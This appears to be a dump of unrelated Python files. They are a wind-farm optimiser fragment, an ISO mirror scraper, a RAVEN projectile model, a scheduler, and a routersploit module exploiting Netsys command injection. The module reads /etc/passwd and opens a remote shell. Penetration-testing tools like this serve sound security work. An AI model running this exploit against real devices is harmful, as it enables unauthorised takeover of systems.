ys = np.array([1*D, 7*D, 1*D, 7*D, 1*D, 7*D])
florisOptimiser(ws=7, ti=0.11, layout_x=xs, layout_y=ys, plots=True)
neuralOptimiser(ws=7, ti=0.11, xs=xs, ys=ys, plots=True, floris_gain=True)
# # Yaw power heatmaps
heatmap(xs, ys, res=10, farm_opt=False)
input()
# Case B (yaw)
xs = np.array([1*D, 1*D, 1*D, 4.5*D, 4.5*D,
8*D, 8*D, 8*D, 11.5*D, 11.5*D,
15*D, 15*D, 15*D, 18.5*D, 18.5*D])
ys = np.array([1*D, 5*D, 9*D, 3*D, 7*D,
1*D, 5*D, 9*D, 3*D, 7*D,
1*D, 5*D, 9*D, 3*D, 7*D])
florisOptimiser(ws=11, ti=0.11, layout_x=xs, layout_y=ys, plots=True)
neuralOptimiser(ws=11, ti=0.11, xs=xs, ys=ys, plots=True, floris_gain=True)
# Yaw power heatmaps
heatmap(xs, ys, res=10, farm_opt=False)
if test == 4:
# Layout Optimisation
# Case C
xs = np.array([1*D, 1*D, 8*D, 8*D, 15*D, 15*D])
ys = np.array([1*D, 5*D, 1*D, 5*D, 1*D, 5*D])
florisOptimiser(ws=7, ti=0.05, layout_x=xs, layout_y=ys, plots=True, mode='farm')
neuralOptimiser(ws=7, ti=0.05, xs=xs, ys=ys, plots=True, floris_gain=True, mode='farm')
# Layout power heatmaps
heatmap(xs, ys, farm_opt=True)
if __name__=="__main__":
main()
|
py | b40441624c21fac043c73d7f9d996dedfc3e082c | from public import * # noqa
def init():
array = []
base_url = "https://backbox.mirror.garr.it"
html = bs(requests.get(base_url).text, "html.parser")
for filename in html.find_all("a", {"href": re.compile("^.*\.iso$")}):
iso_url = f"{base_url}/{filename['href']}"
iso_arch = get_iso_arch(iso_url)
iso_size = get_iso_size(iso_url)
iso_version = re.search(r"backbox-(\d+)", iso_url).group(1)
array.append((iso_url, iso_arch, iso_size, iso_version))
return array
|
py | b4044217792cce0a4a8c69e11ca89ef2da2c2e06 | # Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#***************************************
#* Simple analytic test ExternalModule *
#***************************************
#
# Simulates time-dependent track of a projectile through the air from start to 0,
# assuming no air resistance.
# Inputs:
# (x0,y0) - initial position
# v0 - initial total velocity
# ang - angle of initial motion, in degrees, with respect to flat ground
# Outputs:
# (x,y) - vector positions of projectile in time
# t - corresponding time steps
#
import numpy as np
def prange(v,th,y0=0,g=9.8):
"""
Calculates the analytic range.
@ In, v, float, velocity of the projectile
@ In, th, float, angle to the ground for initial projectile motion
@ In, y0, float, optional, initial height of projectile
@ In, g, float, optional, gravitational constant (m/s/s)
@ Out, prange, float, range
"""
return v*np.cos(th)/g * (v*np.sin(th) + np.sqrt(v*v*np.sin(th)**2+2.*g*y0))
def time_to_ground(v,th,y0=0,g=9.8):
"""
Calculates the analytic time of flight
@ In, v, float, velocity of the projectile
@ In, th, float, angle to the ground for initial projectile motion
@ In, y0, float, optional, initial height of projectile
@ In, g, float, optional, gravitational constant (m/s/s)
@ Out, time_to_ground, float, time projectile is above the ground
"""
return v*np.sin(th)/g + np.sqrt(v*v*np.sin(th)**2+2.*g*y0)/g
def x_pos(x0,v,t):
"""
Calculates the x position in time
@ In, x0, float, initial horizontal position
@ In, v, float, velocity of the projectile
@ In, t, float, time of flight
@ Out, x_pos, float, horizontal position
"""
return x0 + v*t
def y_pos(y0,v,t):
"""
Calculates the analytic vertical position in time
@ In, y0, float, initial vertical position
@ In, v, float, velocity of the projectile
@ In, t, float, time of flight
@ Out, y_pos, float, vertical position
"""
return y0 + v*t - 4.9*t*t
def run(self,Input):
"""
Method require by RAVEN to run this as an external model.
@ In, self, object, object to store members on
@ In, Input, dict, dictionary containing inputs from RAVEN
@ Out, None
"""
x0 = Input.get('x0',0.0)
y0 = Input.get('y0',0.0)
v0 = Input.get('v0',1.0)
ang = Input.get('angle',45.)*np.pi/180.
self.x0 = x0
self.y0 = y0
self.v0 = v0
self.ang = ang
ts = np.linspace(0,0.1,10)
#ts = np.linspace(0,time_to_ground(v0,ang,y0),20)
vx0 = np.cos(ang)*v0
vy0 = np.sin(ang)*v0
r = prange(v0,ang,y0)
self.x = np.zeros(len(ts))
self.y = np.zeros(len(ts))
self.r = np.zeros(len(ts))
for i,t in enumerate(ts):
self.x[i] = x_pos(x0,vx0,t)
self.y[i] = y_pos(y0,vy0,t)
self.r[i] = r
self.time = ts
#can be used as a code as well
if __name__=="__main__":
import sys
inFile = sys.argv[sys.argv.index('-i')+1]
outFile = sys.argv[sys.argv.index('-o')+1]
#construct the input
Input = {}
for line in open(inFile,'r'):
arg,val = (a.strip() for a in line.split('='))
Input[arg] = float(val)
#make a dummy class to hold values
class IO:
"""
Dummy class to hold values like RAVEN does
"""
pass
io = IO()
#run the code
run(io,Input)
#write output
outFile = open(outFile+'.csv','w')
outFile.writelines('x0,y0,v0,ang,r,t,x,y\n')
inpstr = ','.join(str(i) for i in (io.x0,io.y0,io.v0,io.ang))
for i in range(len(io.time)):
outFile.writelines(inpstr+',%f,%f,%f,%f\n' %(io.r[i],io.x[i],io.y[i],io.time[i]))
outFile.close()
|
py | b4044304b04b4532b51a0f22d707bc50089503b0 | import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
http_request,
mute,
validators,
random_text,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Netsys multiple remote command execution vulnerabilities.
If the target is vulnerable it allows to execute commands on operating system level.
"""
__info__ = {
'name': 'Netsys Multi RCE',
'description': 'Exploits Netsys multiple remote command execution vulnerabilities that allows executing commands on operating system level',
'authors': [
'admin <admin[at]bbs.00wz.top>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://bbs.00wz.top/forum.php?mod=viewthread&tid=12630',
],
'devices': [
'Multiple Netsys',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(9090, 'Target port') # default port
injections = ["/view/IPV6/ipv6networktool/traceroute/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}",
"/view/systemConfig/systemTool/ping/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}",
"/view/systemConfig/systemTool/traceRoute/traceroute.php?text_target=127.0.0.1&text_ageout=2&text_minttl=1&text_maxttl=1|{}"]
valid = None
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsle")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
marker = random_text(16)
cmd = cmd.replace(" ", "+")
payload = "echo+{};{};echo+{};".format(marker, cmd, marker)
inj = self.valid.format(payload)
url = "{}:{}{}".format(self.target, self.port, inj)
response = http_request(method="GET", url=url)
if response is None:
return ""
regexp = "{}(.+?){}".format(marker, marker)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
@mute
def check(self):
cmd = "cat+/etc/passwd;"
for injection in self.injections:
inj = injection.format(cmd)
url = "{}:{}{}".format(self.target, self.port, inj)
response = http_request(method="GET", url=url)
if response is None:
continue
if "root:" in response.text:
self.valid = injection
return True # target is vulnerable
return False # target not vulnerable
|
py | b4044335ada82111b8357922b6f89f486129af33 | from collections import deque
from core.observers.AbstractObserver import AbstractObserver
import datetime
import time
class NotifyCheckerObserver(AbstractObserver):
__instance__ = None
def __init__(self):
super().__init__()
self._msg_queue = deque()
def set_group(self, group):
self._group = group
def execute(self, *args):
def first_zero(some_time):
if len(str(some_time)) == 1:
some_time = '0' + str(some_time)
return some_time
return some_time
start_min = 0
while True:
today = datetime.datetime.today().timetuple()
minute = today.tm_min
if start_min != minute:
start_min = minute
else:
time.sleep(40)
continue
wday = today.tm_wday
hour = today.tm_hour
ctime = '{hour}:{minute}'.format(
hour=hour,
minute=first_zero(minute))
for command in self.commands:
# print(command.name, command.activate_times, command.activate_days)
if wday in command.activate_days and \
ctime in command.activate_times:
self._msg_queue.append(command.autostart_func(*args))
while len(self._msg_queue) > 0:
message = self._msg_queue.popleft()
if message:
self._group.broadcast(self._group.get_members(), message)
if __name__ == '__main__':
from commands import UntillEge
notify_observer = NotifyCheckerObserver()
notify_observer.add(UntillEge('18-05-28'))
notify_observer.execute()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.